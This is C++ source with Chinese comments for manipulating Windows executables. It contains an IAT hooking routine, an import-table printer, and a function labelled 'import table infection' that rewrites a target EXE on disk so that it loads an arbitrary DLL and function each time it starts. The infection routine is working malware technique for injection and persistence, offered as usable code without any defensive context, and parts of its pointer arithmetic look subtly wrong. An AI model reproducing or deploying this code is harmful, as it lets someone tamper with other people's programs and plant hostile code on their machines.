DWORD* CIATHook::IATHook( /*HMODULE hDllWhichImports,*/ char *DllImportsFrom, char *OldFunctionName ){
if (!this->loaded) return 0;
DWORD dwIndex;
DWORD dwOffset;
HMODULE hDllWhichImports = this->moduleimporting;
PIMAGE_DATA_DIRECTORY pDataDirectory;
PIMAGE_DOS_HEADER pDosHeader;
PDWORD pdwIAT;
PDWORD pdwINT;
PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor;
PIMAGE_IMPORT_BY_NAME pImportName;
PIMAGE_OPTIONAL_HEADER pOptionalHeader;
PIMAGE_NT_HEADERS pPeHeader;
PSTR strCurrent;
//hDllWhichImports = GetModuleHandleA(DllWhichImports);
if(!hDllWhichImports) return NULL;
pDosHeader = PIMAGE_DOS_HEADER(hDllWhichImports);
dwOffset = pDosHeader->e_lfanew;
pPeHeader = PIMAGE_NT_HEADERS(long(hDllWhichImports) + dwOffset);
pOptionalHeader = &pPeHeader->OptionalHeader;
pDataDirectory = pOptionalHeader->DataDirectory;
dwOffset = pDataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
pImportDescriptor = PIMAGE_IMPORT_DESCRIPTOR(long(hDllWhichImports) + dwOffset);
for(dwIndex = 0; true; dwIndex++)
{
dwOffset = pImportDescriptor[dwIndex].Name;
if (!dwOffset) return NULL;
strCurrent = PSTR(long(hDllWhichImports) + dwOffset);
if(_stricmp( strCurrent, DllImportsFrom) == 0 )
{
break;
}
}
dwOffset = pImportDescriptor[dwIndex].FirstThunk;
pdwIAT = PDWORD(long(hDllWhichImports) + dwOffset);
dwOffset = pImportDescriptor[dwIndex].OriginalFirstThunk;
pdwINT = PDWORD(long(hDllWhichImports) + dwOffset);
for(dwIndex = 0; true; dwIndex++)
{
dwOffset = pdwINT[dwIndex];
if (!dwOffset) return NULL;
pImportName = PIMAGE_IMPORT_BY_NAME(long(hDllWhichImports) + dwOffset);
strCurrent = PSTR(pImportName->Name);
if(_stricmp(strCurrent, OldFunctionName) == 0)
{
return &pdwIAT[dwIndex];
}
}
return NULL;
}
HRESULT PE_PrintImport(PBYTE pBase, IMAGE_DATA_DIRECTORY DataImport, BOOL bImport)
{
HRESULT result = S_OK;
PIMAGE_IMPORT_DESCRIPTOR pImportBlack = NULL;
PIMAGE_THUNK_DATA32 pFirstThunkData32 = NULL;
PIMAGE_THUNK_DATA32 pOriginalThunkData32 = NULL;
PIMAGE_IMPORT_BY_NAME pImageImportByName = NULL;
pImportBlack = PIMAGE_IMPORT_DESCRIPTOR(pBase + DataImport.VirtualAddress);
if (!pImportBlack || !DataImport.Size)
{
dprintf("没有导入表 \n");
return S_OK ;
}
char *pDllName = NULL;
if (bImport)
{
while (pImportBlack->Name != 0 && pImportBlack->Characteristics != 0)
{
pFirstThunkData32 = (PIMAGE_THUNK_DATA32)((ULONG)pBase + (ULONG)(pImportBlack->FirstThunk));
pOriginalThunkData32 = (PIMAGE_THUNK_DATA32)((ULONG)pBase + (ULONG)(pImportBlack->OriginalFirstThunk));
pDllName = (PCHAR)((ULONG_PTR)pBase + (ULONG_PTR)pImportBlack->Name);
dprintf("DLL name is %s\n", pDllName);
dprintf("序号 相对偏移 函数地址 函数名称 \n");
while (pOriginalThunkData32->u1.Ordinal != 0)
{
if (IMAGE_SNAP_BY_ORDINAL32(pOriginalThunkData32->u1.Ordinal))
{
dprintf("%04d 0x%08x 0x%08x 无\n", IMAGE_ORDINAL32(pOriginalThunkData32->u1.Ordinal), (ULONG_PTR)pOriginalThunkData32 - (ULONG_PTR)pBase, *pFirstThunkData32);
}
else
{
pImageImportByName = (PIMAGE_IMPORT_BY_NAME)((UCHAR*)pBase + pOriginalThunkData32->u1.AddressOfData);
dprintf("%04d 0x%08x 0x%08x %s\n", pImageImportByName->Hint, (ULONG_PTR)pOriginalThunkData32->u1.AddressOfData, *pFirstThunkData32, pImageImportByName->Name);
}
pOriginalThunkData32++;
pFirstThunkData32++;
}
pImportBlack++;
}
}
return result;
}
//导入表感染
void pe_infect_eat(LPTSTR lpFilePath,LPSTR lpDllName,LPSTR lpFuncName,ppe_retn_msg p_msg)
{
//打开文件
HANDLE hFile = CreateFile(lpFilePath,
GENERIC_WRITE | GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
//打开文件失败
if(hFile == INVALID_HANDLE_VALUE)
{
p_msg->isSuccessed = false;
swprintf(p_msg->tsMsg,L"can't create file! error code : %d",GetLastError());
//
return;
}
//获得文件大小
DWORD dwFileSize = GetFileSize(hFile , 0 );
//映射文件
HANDLE hMap = CreateFileMapping(hFile ,
0 ,
PAGE_READWRITE ,
0 ,
dwFileSize ,
0);
//文件映射内存失败
if(hMap == INVALID_HANDLE_VALUE)
{
CloseHandle(hFile);
p_msg->isSuccessed = false;
swprintf(p_msg->tsMsg,L"can't create file mapping! error code : %d",GetLastError());
//
return ;
}
//获得映射基址
PBYTE lpBase = (PBYTE)MapViewOfFile(hMap , FILE_MAP_READ | FILE_MAP_WRITE , 0 , 0 , dwFileSize);
//文件映射内存失败
if(lpBase == NULL)
{
CloseHandle(hFile);
CloseHandle(hMap);
UnmapViewOfFile(lpBase);
p_msg->isSuccessed = false;
swprintf(p_msg->tsMsg,L"can't map view of file! error code : %d",GetLastError());
//
return ;
}
//dos
PIMAGE_DOS_HEADER pImage_dos_header = (PIMAGE_DOS_HEADER)lpBase;
//nt
PIMAGE_NT_HEADERS pImage_nt_header = (PIMAGE_NT_HEADERS)((DWORD)lpBase + pImage_dos_header->e_lfanew);
//
PIMAGE_OPTIONAL_HEADER32 pImage_optional_header = (PIMAGE_OPTIONAL_HEADER32)(lpBase + pImage_dos_header->e_lfanew + 4 + sizeof(IMAGE_FILE_HEADER));
//sec
PIMAGE_SECTION_HEADER pImage_section_header = IMAGE_FIRST_SECTION(pImage_nt_header);
//.text section PointerToRawData
DWORD dwSectionOffset = pe_getTextSecOffset(pImage_section_header, pImage_nt_header->FileHeader.NumberOfSections);
//
if(dwSectionOffset == 0)
{
CloseHandle(hFile);
CloseHandle(hMap);
UnmapViewOfFile(lpBase);
p_msg->isSuccessed = false;
swprintf(p_msg->tsMsg,L"can't find .text section!");
//
return ;
}
/*
PointerToRawData 为节区在PE文件中的偏移
SizeOfRawData >= VirtualSize
VirtualSize 是节在内存中的长度
SizeOfRawData 则是VirtualSize经文件对齐后的尺寸。
比如: 你的.text的代码段长是0x110但是文件对齐尺寸是0x400,那.text的SizeOfRawData 就是0x400,而virtualSize就是0x110
*/
//import
PIMAGE_IMPORT_DESCRIPTOR pImage_import_descriptor = (PIMAGE_IMPORT_DESCRIPTOR)ImageRvaToVa(pImage_nt_header,lpBase,pImage_nt_header->OptionalHeader.DataDirectory[1].VirtualAddress,NULL);
//
int importTableCount = 0;
//获得导入表的数目
while(pImage_import_descriptor[importTableCount].Characteristics != 0)
{
importTableCount ++;
}
//已有导入表数据的大小
DWORD dwBufferSize = sizeof(IMAGE_IMPORT_DESCRIPTOR) * importTableCount;
//获得第一个块的va
PBYTE pSectionEnd = lpBase + pImage_section_header->PointerToRawData + pImage_section_header->SizeOfRawData - 1;
//空闲空间大小
UINT pPadSize = 0;
//获得空闲空间大小
while(*pSectionEnd == 0)
{
pPadSize ++;
pSectionEnd --;
}
//
PBYTE pSectionStart = pSectionEnd;
if (pPadSize < dwBufferSize + sizeof(IMAGE_IMPORT_DESCRIPTOR))
{
CloseHandle(hFile);
CloseHandle(hMap);
UnmapViewOfFile(lpBase);
p_msg->isSuccessed = false;
swprintf(p_msg->tsMsg,L"not enough space in .text section!");
//
return ;
}
//复制原始的引入表到.text空闲空间里面
memcpy(pSectionStart,pImage_import_descriptor,dwBufferSize);
//清空原始的引入表
memset(pImage_import_descriptor,0,dwBufferSize);
//定义一个新的引入表
PIMAGE_IMPORT_DESCRIPTOR pImage_import_descriptor_new = PIMAGE_IMPORT_DESCRIPTOR(pSectionStart + dwBufferSize);
//新的dll name
strcpy((PCHAR)pImage_import_descriptor,lpDllName);
PIMAGE_IMPORT_BY_NAME pImage_import_by_name = (PIMAGE_IMPORT_BY_NAME)((PCHAR)(pImage_import_descriptor + 1)) + 5;
//image_thunk_data
DWORD dwThunkData = (DWORD)ImageVaToRva(pImage_nt_header,lpBase,(ULONG)pImage_import_by_name);
memcpy((PCHAR)(pImage_import_descriptor + 1), &dwThunkData, 4);
pImage_import_by_name->Hint = 0;
//复制函数名
strcpy((PCHAR)pImage_import_by_name->Name,lpFuncName);
pImage_import_descriptor_new->Name = (DWORD)ImageVaToRva(pImage_nt_header,lpBase,(ULONG)pImage_import_descriptor);
pImage_import_descriptor_new->FirstThunk = (DWORD)ImageVaToRva(pImage_nt_header,lpBase,(ULONG)(pImage_import_descriptor + 1));
pImage_import_descriptor_new->OriginalFirstThunk = (DWORD)ImageVaToRva(pImage_nt_header,lpBase,(ULONG)(pImage_import_descriptor + 1));
pImage_import_descriptor_new->ForwarderChain = 0;
pImage_import_descriptor_new->TimeDateStamp = 0;
pImage_optional_header->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress = (DWORD)ImageVaToRva(pImage_nt_header,lpBase,(ULONG)(pSectionStart));
pImage_optional_header->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size +=sizeof(IMAGE_IMPORT_DESCRIPTOR);
CloseHandle(hFile);
CloseHandle(hMap);
UnmapViewOfFile(lpBase);
p_msg->isSuccessed = true;
//
return ;
}
